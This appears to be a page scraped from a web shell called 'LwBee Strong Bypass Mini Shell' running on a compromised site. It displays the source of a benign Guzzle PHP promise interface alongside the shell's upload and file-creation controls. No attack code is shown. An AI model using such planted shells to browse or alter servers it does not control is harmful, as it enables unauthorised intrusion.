/home/aloic1/public_html/core/vendor/guzzlehttp/promises/src/PromisorInterface.php
<?php

namespace GuzzleHttp\Promise;

/**
 * Interface used with classes that return a promise.
 */
interface PromisorInterface
{
    /**
     * Returns a promise.
     *
     * @return PromiseInterface
     */
    public function promise();
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File